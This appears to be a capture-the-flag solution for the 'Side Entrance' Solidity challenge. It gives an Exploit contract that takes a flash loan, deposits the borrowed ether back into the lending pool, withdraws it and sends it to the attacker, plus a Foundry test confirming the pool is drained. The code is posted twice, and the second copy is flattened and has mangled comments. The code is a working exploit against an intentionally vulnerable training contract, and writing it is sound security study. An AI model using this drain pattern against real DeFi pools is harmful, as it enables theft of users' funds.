Zeegaths · April 6, 2024 18:52
diff --git a/exploit.sol b/exploit.sol
 import {Address} from "@openzeppelin/contracts/utils/Address.sol";
 import {SideEntranceLenderPool} from "./SideEntranceLenderPool.sol";
 interface IFlashLoanEtherReceiver {
    function execute() external payable;
 }


 contract Exploit is IFlashLoanEtherReceiver {
    using Address for address payable;

    SideEntranceLenderPool private pool;
    address private owner;

    constructor(SideEntranceLenderPool _pool) {
        owner = msg.sender;
        pool = _pool;
    }

    function execute() external payable {
        require(msg.sender == address(pool), "Sender is not a pool");
        pool.deposit{value: msg.value}();
    }

    function run() external {
        require(msg.sender == owner, "Not an owner");
        uint256 poolBalance = address(pool).balance;
        pool.flashLoan(poolBalance);
        pool.withdraw();

        payable(owner).sendValue(address(this).balance);
    }

    receive() external payable {}
 }
diff --git a/test.sol b/test.sol
 // SPDX-License-Identifier: MIT
 pragma solidity >=0.8.0;

 import {Utilities} from "../../utils/Utilities.sol";
 import "forge-std/Test.sol";

 import {SideEntranceLenderPool} from "../src/SideEntranceLenderPool.sol";
 import {Exploit} from "../src/Exploit.sol";

 contract SideEntrance is Test {
    uint256 internal constant ETHER_IN_POOL = 1_000e18;

    Utilities internal utils;
    SideEntranceLenderPool internal sideEntranceLenderPool;
    address payable internal attacker;
    uint256 public attackerInitialEthBalance;

    function setUp() public {
        utils = new Utilities();
        address payable[] memory users = utils.createUsers(1);
        attacker = users[0];
        vm.label(attacker, "Attacker");

        sideEntranceLenderPool = new SideEntranceLenderPool();
        vm.label(address(sideEntranceLenderPool), "Side Entrance Lender Pool");

        vm.deal(address(sideEntranceLenderPool), ETHER_IN_POOL);

        assertEq(address(sideEntranceLenderPool).balance, ETHER_IN_POOL);

        attackerInitialEthBalance = address(attacker).balance;

        console.log(unicode"🧨 Let's see if you can break it... 🧨");
    }

    function testExploit() public {
         
    /** EXPLOIT START **/
        vm.startPrank(attacker);
        Exploit expl = new Exploit(sideEntranceLenderPool);
        expl.run();
        vm.stopPrank();
   
     
        validation();
        console.log(unicode"\n🎉 Congratulations");
    }

    function validation() internal {
        assertEq(address(sideEntranceLenderPool).balance, 0);
        assertGt(attacker.balance, attackerInitialEthBalance);
    }
 }
	import {Address} from "@openzeppelin/contracts/utils/Address.sol";
	import {SideEntranceLenderPool} from "./SideEntranceLenderPool.sol";
	interface IFlashLoanEtherReceiver {
	function execute() external payable;
	}


	contract Exploit is IFlashLoanEtherReceiver {
	using Address for address payable;

	SideEntranceLenderPool private pool;
	address private owner;

	constructor(SideEntranceLenderPool _pool) {
	owner = msg.sender;
	pool = _pool;
	}

	function execute() external payable {
	require(msg.sender == address(pool), "Sender is not a pool");
	pool.deposit{value: msg.value}();
	}

	function run() external {
	require(msg.sender == owner, "Not an owner");
	uint256 poolBalance = address(pool).balance;
	pool.flashLoan(poolBalance);
	pool.withdraw();

	payable(owner).sendValue(address(this).balance);
	}

	receive() external payable {}
	}
	// SPDX-License-Identifier: MIT
	pragma solidity >=0.8.0;

	import {Utilities} from "../../utils/Utilities.sol";
	import "forge-std/Test.sol";

	import {SideEntranceLenderPool} from "../src/SideEntranceLenderPool.sol";
	import {Exploit} from "../src/Exploit.sol";

	contract SideEntrance is Test {
	uint256 internal constant ETHER_IN_POOL = 1_000e18;

	Utilities internal utils;
	SideEntranceLenderPool internal sideEntranceLenderPool;
	address payable internal attacker;
	uint256 public attackerInitialEthBalance;

	function setUp() public {
	utils = new Utilities();
	address payable[] memory users = utils.createUsers(1);
	attacker = users[0];
	vm.label(attacker, "Attacker");

	sideEntranceLenderPool = new SideEntranceLenderPool();
	vm.label(address(sideEntranceLenderPool), "Side Entrance Lender Pool");

	vm.deal(address(sideEntranceLenderPool), ETHER_IN_POOL);

	assertEq(address(sideEntranceLenderPool).balance, ETHER_IN_POOL);

	attackerInitialEthBalance = address(attacker).balance;

	console.log(unicode"🧨 Let's see if you can break it... 🧨");
	}

	function testExploit() public {

	/ EXPLOIT START /
	vm.startPrank(attacker);
	Exploit expl = new Exploit(sideEntranceLenderPool);
	expl.run();
	vm.stopPrank();


	validation();
	console.log(unicode"\n🎉 Congratulations");
	}

	function validation() internal {
	assertEq(address(sideEntranceLenderPool).balance, 0);
	assertGt(attacker.balance, attackerInitialEthBalance);
	}
	}